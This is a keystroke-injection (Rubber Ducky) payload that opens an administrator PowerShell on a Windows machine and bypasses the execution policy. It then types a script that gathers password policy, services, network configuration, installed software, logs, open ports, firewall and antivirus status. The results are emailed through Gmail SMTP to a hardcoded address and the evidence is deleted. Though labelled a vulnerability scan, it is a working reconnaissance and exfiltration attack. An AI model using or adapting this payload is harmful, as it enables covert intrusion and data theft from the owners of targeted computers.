REM script in progress DELAY 5000 REM Open Start Menu CONTROL ESCAPE DELAY 3000 STRING powershell DELAY 3000 REM Navigate to the context menu to run PowerShell as an administrator DOWNARROW DELAY 1500 RIGHTARROW DELAY 1500 DOWNARROW DELAY 1500 DOWNARROW DELAY 1500 ENTER DELAY 5000 ALT Y DELAY 5000 REM Set PowerShell Execution Policy to Bypass DELAY 500 STRING Set-ExecutionPolicy Bypass -Scope Process -Force DELAY 500 ENTER DELAY 500 REM Create the PowerShell script in memory and execute it DELAY 500 STRING $securePassword = ConvertTo-SecureString 'YourAppSpecificPassword' -AsPlainText -Force DELAY 500 ENTER DELAY 500 STRING $credential = New-Object System.Management.Automation.PSCredential ('igrowsc@gmail.com', $securePassword) DELAY 500 ENTER DELAY 500 STRING $script = { DELAY 500 ENTER DELAY 500 STRING function Check-PasswordPolicy { DELAY 500 ENTER DELAY 500 STRING net accounts DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Audit-Services { DELAY 500 ENTER DELAY 500 STRING Get-Service | Select-Object Name, DisplayName, Status, StartType DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-NetworkSettings { DELAY 500 ENTER DELAY 500 STRING Get-NetIPConfiguration DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-SoftwareVulnerabilities { DELAY 500 ENTER DELAY 500 STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-CVE { DELAY 500 ENTER DELAY 500 STRING param ( DELAY 500 ENTER DELAY 500 STRING [string]$productName, DELAY 500 ENTER DELAY 500 STRING [string]$version DELAY 500 ENTER DELAY 500 STRING ) DELAY 500 ENTER DELAY 500 STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productName+$version" DELAY 500 ENTER DELAY 500 STRING Start-Sleep -Seconds 5 DELAY 500 ENTER DELAY 500 STRING $response = Invoke-RestMethod -Uri $uri -Method Get DELAY 500 ENTER DELAY 500 STRING if ($response.totalResults -gt 0) { DELAY 500 ENTER DELAY 500 STRING foreach ($cve in $response.result.CVE_Items) { DELAY 500 ENTER DELAY 500 STRING "$($cve.cve.CVE_data_meta.ID) - $($cve.cve.description.description_data[0].value)" DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING } else { DELAY 500 ENTER DELAY 500 STRING "No CVEs found for $productName $version" DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Analyze-Logs { DELAY 500 ENTER DELAY 500 STRING Get-EventLog -LogName System -Newest 100 DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-OpenPorts { DELAY 500 ENTER DELAY 500 STRING netstat -an DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-MissingUpdates { DELAY 500 ENTER DELAY 500 STRING Get-WindowsUpdateLog DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-FirewallStatus { DELAY 500 ENTER DELAY 500 STRING netsh advfirewall show allprofiles DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-SMBv1Status { DELAY 500 ENTER DELAY 500 STRING Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Check-AntivirusStatus { DELAY 500 ENTER DELAY 500 STRING Get-MpComputerStatus DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING function Send-EmailAndCleanup { DELAY 500 ENTER DELAY 500 STRING param ( DELAY 500 ENTER DELAY 500 STRING [string]$smtpServer, DELAY 500 ENTER DELAY 500 STRING [string]$smtpFrom, DELAY 500 ENTER DELAY 500 STRING [string]$smtpTo, DELAY 500 ENTER DELAY 500 STRING [string]$messageSubject, DELAY 500 ENTER DELAY 500 STRING [string]$messageBody, DELAY 500 ENTER DELAY 500 STRING [string]$attachmentPath, DELAY 500 ENTER DELAY 500 STRING [System.Management.Automation.PSCredential]$credential DELAY 500 ENTER DELAY 500 STRING ) DELAY 500 ENTER DELAY 500 STRING $smtp = New-Object Net.Mail.SmtpClient($smtpServer) DELAY 500 ENTER DELAY 500 STRING $smtp.Credentials = $credential DELAY 500 ENTER DELAY 500 STRING $smtp.EnableSsl = $true DELAY 500 ENTER DELAY 500 STRING $smtp.Send($smtpFrom, $smtpTo, $messageSubject, $messageBody + (Get-Content -Path $attachmentPath -Raw)) DELAY 500 ENTER DELAY 500 STRING Remove-Item -Path $attachmentPath DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING Check-PasswordPolicy > results.txt DELAY 500 ENTER DELAY 500 STRING Audit-Services >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-NetworkSettings >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-SoftwareVulnerabilities >> results.txt DELAY 500 ENTER DELAY 500 STRING Analyze-Logs >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-OpenPorts >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-MissingUpdates >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-FirewallStatus >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-SMBv1Status >> results.txt DELAY 500 ENTER DELAY 500 STRING Check-AntivirusStatus >> results.txt DELAY 500 ENTER DELAY 500 STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | ForEach-Object { Check-CVE -productName $_.DisplayName -version $_.DisplayVersion } >> results.txt DELAY 500 ENTER DELAY 500 STRING Send-EmailAndCleanup -smtpServer "smtp.gmail.com" -smtpFrom "igrowsc@gmail.com" -smtpTo "igrowsc@gmail.com" -messageSubject "Vulnerability Scan Results" -messageBody "Attached are the results of the vulnerability scan." -attachmentPath "results.txt" -credential $credential DELAY 500 ENTER DELAY 500 STRING Remove-Item -Path $MyInvocation.MyCommand.Path DELAY 500 ENTER DELAY 500 STRING } DELAY 500 ENTER DELAY 500 STRING Invoke-Command -ScriptBlock $script DELAY 500 ENTER DELAY 20000